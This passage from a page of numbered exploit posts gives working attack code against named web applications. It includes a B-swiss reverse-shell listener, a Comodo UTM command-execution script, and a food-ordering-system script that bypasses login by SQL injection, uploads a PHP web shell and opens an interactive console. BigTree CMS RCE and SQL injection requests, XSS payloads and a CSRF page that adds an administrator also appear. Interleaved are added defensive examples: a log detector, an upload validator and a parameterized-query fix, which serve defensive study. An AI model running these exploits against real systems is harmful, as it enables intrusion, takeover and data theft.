    def razmisluju(self):
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.phone)
        konac.start()
        sleep(1)
        self.upload()

    def fish(self):
        r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
        response = r.text
        print("[*] Checking for previous attempts...")
        if not ".php" in response:
            print("[*] All good.")
        elif "251.php" in response:
            print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))

    def phone(self):
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] No outgoing calls :( ({msg})".format(msg=p))
                print("[+] Check your port mappings or increase timeout")
                s.close()
                exit(0)
            break
        print("[*] You got shell!")
        telnetus.interact()
        conn.close()

    def main(self):
        self.env()
        self.test()
        self.fish()
        self.rtoken = self.login()
        self.razmisluju()

if __name__ == '__main__':
    Sign().main()
  17. # Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3
# Tested on: windows 10 / xampp
# CVE : CVE-2020-35241

# Proof Of Concept

POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1

_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue

# Snipp
content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
  18. # Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits
    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":
    IP = input("IP: ")
    Port = input("Port: ")
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'  ## Disable SSH
    '''For more info about command try to read manual of spesefic version of Comodo UTM
       and exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC) '''
    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart
    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
        exit(0)
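From the defender's side, the three posts above (Mida eFramework PDC back door, B-swiss stager dropped under /usr/users, Comodo UTM /manage/webshell/u) all leave a recognisable request shape in the web server's access log. The following detector is an added example written for this page, not code from any of the posts or vendors; the Apache-style log lines are constructed, and the client IPs are documentation addresses. It flags a line when the request path matches one of the advisories and, where the advisory names one, the characteristic query parameter is present.

```python
"""Flag access-log lines matching the request shapes in the advisories above.
Added example; the log lines below are constructed, not captured anywhere."""
import re
from urllib.parse import parse_qs, urlsplit

# (rule name, path pattern, query parameter that must be present or None)
RULES = [
    # Mida eFramework PDC back-door password-change endpoint (CVE-2020-15921)
    ("mida-efw-backdoor", re.compile(r"^/PDC/extreq\.php$", re.I), "code"),
    # B-swiss: a PHP file fetched straight from the user-picture directory
    ("b-swiss-stager-fetch", re.compile(r"^/usr/users/[^/]+\.php$", re.I), None),
    # Comodo UTM web console command channel (CVE-2018-17431), command in 'k'
    ("comodo-utm-webshell", re.compile(r"^/manage/webshell/u$", re.I), "k"),
]

# Apache "combined" format, only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: two benign lines interleaved with one hit per advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Aug/2020:10:15:02 +0000] "GET /PDC/extreq.php?code=abcdefghij HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Aug/2020:10:15:30 +0000] "GET /PDC/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Jun/2020:09:01:11 +0000] "GET /usr/users/251.php HTTP/1.1" 200 0 "-" "SignageBot/1.02"
198.51.100.9 - - [13/Jun/2020:09:01:12 +0000] "GET /usr/users/251.jpg HTTP/1.1" 200 9321 "-" "SignageBot/1.02"
192.0.2.44 - - [15/Aug/2018:17:42:00 +0000] "GET /manage/webshell/u?s=1&w=120&h=40&k=%0a&l=10&_=1534354920000 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
192.0.2.44 - - [15/Aug/2018:17:42:05 +0000] "GET /manage/index.html HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""


def classify_request(target):
    """Return the name of the first rule the request target matches, else None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    for name, path_re, param in RULES:
        if path_re.match(parts.path) and (param is None or param in query):
            return name
    return None


def scan(lines):
    """Return (client_ip, rule_name) for every log line that matches a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; a real pipeline would count these
        rule = classify_request(m.group("target"))
        if rule:
            hits.append((m.group("ip"), rule))
    return hits


if __name__ == "__main__":
    for ip, rule in scan(SAMPLE_LOG.splitlines()):
        print("{:<14} {}".format(ip, rule))
```

The path patterns are deliberately narrow so the rule does not fire on the application's normal pages (the `/PDC/index.php` and `/usr/users/251.jpg` lines are not reported); pair a hit with the source IP and, for the B-swiss case, with a file-integrity check of the upload directory, since the stager deletes itself after running.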
  19. # Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A

# Setup: pip3 install bs4 .
# Exploit Code :

import requests,sys,string,random
from bs4 import BeautifulSoup

def get_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str

session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"

def Help():
    print("[?] Usage: python AporlorRCE.py <Domain>")

def Upload():
    session = requests.session()
    burp0_url = Domain+"/admin/ajax.php?action=save_menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
    burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except:
        print("[-] Request Failed")
        Help()

def Login():
    burp0_url = Domain+"/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            print("[+] Login Failed")
    except:
        print("[-] Request Failed")
        Help()

def FoundMyRCE():
    global FileName
    burp0_url = Domain+"/admin/index.php?page=menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            if RandomFileName in MyRCE["src"]:
                FileName = MyRCE["src"].strip("../assets/img/")
                print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
    except:
        print("[-] Request Failed")
        Help()

def Terminal():
    while True:
        Command = input("Console: ")
        burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
        try:
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
        except:
            print("[-] Request Error")

if __name__ == "__main__":
    if len(sys.argv) == 2:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
    else:
        Help()
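Both this post (the 'img' field of save_menu, stored under /assets/img/ with whatever name and content the client sent) and the B-swiss post earlier (the 'rec_poza' picture field, "Blank.jpg.php" stored under /usr/users) are the same missing control: the server trusts the client's file name and Content-Type. The validator below is an added example for this page, not code from either project. It reads exactly one allow-listed extension from the client name, ignores the Content-Type header entirely, requires the first bytes of the content to match the magic bytes of the claimed image type, and returns a server-chosen random name for storage. The sample file contents are constructed.

```python
"""Server-side checks for an image upload field, added as an example.
Not code from the projects discussed; the sample contents are constructed."""
import os
import re
import secrets

# Allowed extensions and the byte signatures a file of that type must begin with.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed samples: a minimal JPEG header and a PHP file.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'not an image'; ?>\n"


class UploadRejected(ValueError):
    """Raised when an upload fails a check; the handler should answer 400."""


def safe_image_name(client_filename, content):
    """Validate an uploaded image and return the name to store it under.

    The client-supplied name is used for one thing only: reading a single,
    allow-listed extension. Path components are discarded, a second extension
    ("Blank.jpg.php") is rejected, the bytes must match the claimed type, and
    the stored name is random so the uploader cannot predict or choose it.
    """
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise UploadRejected("expected <name>.<ext> with exactly one extension")
    ext = parts[1]
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected("extension not allowed: ." + ext)
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        raise UploadRejected("content does not match ." + ext)
    return secrets.token_hex(16) + "." + ext


def accepted(client_filename, content):
    """Convenience wrapper: the stored name on success, None on rejection."""
    try:
        return safe_image_name(client_filename, content)
    except UploadRejected:
        return None


if __name__ == "__main__":
    for name, data in [("menu.jpg", JPEG_SAMPLE), ("shell.jpg.php", PHP_SAMPLE),
                       ("menu.jpg", PHP_SAMPLE), ("../../up.png", JPEG_SAMPLE)]:
        print("{:<16} -> {}".format(name, accepted(name, data)))
```

Validation alone is half of the fix: the directory the files land in should also be served with script execution disabled (for Apache, a per-directory `php_flag engine off` or a handler that only serves static files), so that even a misclassified upload is returned as bytes rather than run.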
  20. # Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: N/A
# Description: The file myform.php does not perform input validation on the request parameters. An attacker can inject javascript payloads in the parameters to perform various attacks such as stealing of cookies, sensitive information etc.

import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
        print print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0])
        sys.exit(-1)

    SERVER_URL = sys.argv[1]
    XSS_DIR = '/myform.php'
    XSS_URL = SERVER_URL + XSS_DIR
    XSS_PoC_URL = SERVER_URL + '/front.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)

    payload = {'name': 'd3crypt','cno':'9876543210','purpose':'stored xss','MeetingTo':'Hack','comment':'<script>alert("xss")</script>','submit_post':'Submit','mydata':''}
    r1 = s.post(url=XSS_URL, data=payload, verify=False)
    r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)

    def get_links(tree):
        refs = tree.xpath("//a")
        links = [link.get('data-content', '') for link in refs]
        return [l for l in links]

    visitors = get_links(tree)
    #print(visitors)
    for visitor in visitors:
        if 'stored xss' in visitor:
            rid=visitor.split(':')[6].strip()
            print print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid)
  21. # Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren 'Aporlorxl23' Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Linux - XAMPP Server
# CVE : N/A

# Vulnerable Source Code:
# /view_prod.php
# [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array();

# PoC:

# Request:
GET /view_prod.php?id=' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

# Response:
HTTP/1.1 200 OK
Date: Tue, 22 Sep 2020 20:44:48 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
X-Powered-By: PHP/7.4.7
Content-Length: 234
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3
Stack trace:
#0 {main}
thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br />

# As You Can See Here PHP Fatal Error Because
# $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array();
# id Value ' This is Wrong Syntax.

# Recommended Fix: You Will Use `mysqli_real_escape_string` On id . And query Will Same With :
$qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array();
Because Here Not Used "" This is Imported.
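The 'id' parameter in this post and in the Seat Reservation System post above is a numeric key spliced straight into the statement text, which is why a single quote produces the fatal error shown in the response. The example below is added for this page (not the project's code) and shows the two-step fix a defender would apply: reject anything that is not an integer, then bind the value as a parameter instead of concatenating it. It uses an in-memory SQLite table constructed for the demonstration; the real application uses MySQL through mysqli, where the same principle applies with prepared statements.

```python
"""Vulnerable and fixed product lookup, added as an example for this page.
The table is constructed in memory; not code from the project."""
import sqlite3


def make_db():
    """Constructed stand-in for the product_list table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product_list (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO product_list VALUES (?, ?, ?)",
                     [(1, "Burger", 5.0), (2, "Pizza", 8.5)])
    return conn


def view_prod_vulnerable(conn, raw_id):
    """Mirrors line 3 of view_prod.php: the raw GET value becomes part of the SQL text."""
    return conn.execute("SELECT * FROM product_list where id = " + raw_id).fetchone()


def view_prod_fixed(conn, raw_id):
    """Validate the type, then bind the value; the SQL text never changes."""
    try:
        pid = int(raw_id)          # an id is an integer; anything else is refused
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT * FROM product_list WHERE id = ?", (pid,)).fetchone()


def demonstrate():
    """Run both versions against the PoC input and return the observations."""
    conn = make_db()
    try:
        view_prod_vulnerable(conn, "'")
        vulnerable_errors = False
    except sqlite3.OperationalError:
        vulnerable_errors = True   # the same class of failure the PoC response shows
    return {
        "vulnerable_errors_on_quote": vulnerable_errors,
        "fixed_valid": view_prod_fixed(conn, "2"),
        "fixed_quote": view_prod_fixed(conn, "'"),
        "fixed_injection": view_prod_fixed(conn, "' OR 1=1 #"),
    }


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print("{:<28} {}".format(key, value))
```

Binding parameters is preferable to escaping for a numeric column: escaping only protects a quoted string literal, and an id that is not wrapped in quotes stays injectable even after `mysqli_real_escape_string`. With a bound parameter the database engine receives the value separately from the query, so the input can never change the statement's structure.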
  22. # Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
# Google Dork: " BigTree CMS "
# Date: 2020-25-09
# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/
# Version: 4.4.10
# Tested on: Windows
# CVE : N/A

## 1. Authenticated Remote Code Execution
# Attack type: Remote
# Impact: Remote arbitrary code execution
# Affected component(s): /core/admin/field-types/list/draw.php
# Attack vectors: Authenticated user (developer) can inject malicious command to the applications via create new setting function:
# Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE).
# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
# POC: Developer create setting and code will be executed when load settings:

POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Origin: http://xxxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
Upgrade-Insecure-Requests: 1

__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>

# Video: https://vimeo.com/461667065

## 2. Authenticated SQL Injection
# Attack type: Remote
# Impact: Authenticated SQL Injection in BigTree CMS
# Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via create new feed function:
# Affected component(s): /core/feeds/custom.php
# Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query.
# Severity (CVSS 3.1): Base Score: 7.2 HIGH
# POC: Request create or edit feed:

POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Origin: http://xxxx
Connection: close
Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
Cookie: yyyy

__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12

# Video: https://vimeo.com/461667107

## 3. Authenticated Stored Cross-Site Scripting
# Attack type: Remote
# Impact: Stored XSS
# Affected component(s): site/index.php/admin/pages/update
# Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via create or update page function:
# Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update
# Severity (CVSS 3): Base Score: 6.5 MEDIUM
# POC: Request create or edit page:

POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
Content-Length: 12173
Origin: http://xxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
Cookie: yyyy

---some fields here---
<p>&nbsp;<span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
-----------------------------2320192840320212926996245368
---some fields here---

# Video: https://vimeo.com/461667129
  23. # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin) # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 <!-- B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. 
Tested on: Linux 5.3.0-46-generic x86_64
           Linux 4.15.0-20-generic x86_64
           Linux 4.9.78-xxxx-std-ipv6-64
           Linux 4.7.0-040700-generic x86_64
           Linux 4.2.0-27-generic x86_64
           Linux 3.19.0-47-generic x86_64
           Linux 2.6.32-5-amd64 x86_64
           Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
           macOS 10.13.5
           Microsoft Windows 7 Business Edition SP1 i586
           Apache/2.4.29 (Ubuntu)
           Apache/2.4.18 (Ubuntu)
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Win64)
           Apache/2.4.18 (Ubuntu)
           Apache/2.2.16 (Debian)
           PHP/7.2.24-0ubuntu0.18.04.6
           PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
           PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
           PHP/5.6.31
           PHP/5.6.30-10+deb.sury.org~xenial+2
           PHP/5.5.9-1ubuntu4.17
           PHP/5.5.9-1ubuntu4.14
           PHP/5.3.10
           PHP/5.3.13
           PHP/5.3.3-7+squeeze16
           PHP/5.3.3-7+squeeze17
           MySQL/5.5.49
           MySQL/5.5.47
           MySQL/5.5.40
           MySQL/5.5.30
           MySQL/5.1.66
           MySQL/5.1.49
           MySQL/5.0.77
           MySQL/5.0.12-dev
           MySQL/5.0.11-dev
           MySQL/5.0.8-dev
           phpMyAdmin/3.5.7
           phpMyAdmin/3.4.10.1deb1
           phpMyAdmin/3.4.7
           phpMyAdmin/3.3.7deb7
           WampServer 3.2.0
           Acore Framework 2.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5589
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php


13.06.2020

-->

<html>
  <body>
  <h1>CSRF Add b-swiss Maintenance Admin</h1>
    <script>
      function GodMode() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"locator\"\r\n" +
          "\r\n" +
          "Users.Save\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"page\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"sort\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"id\"\r\n" +
          "\r\n" +
          "\r\n" +
          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
          "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
          "\r\n" +
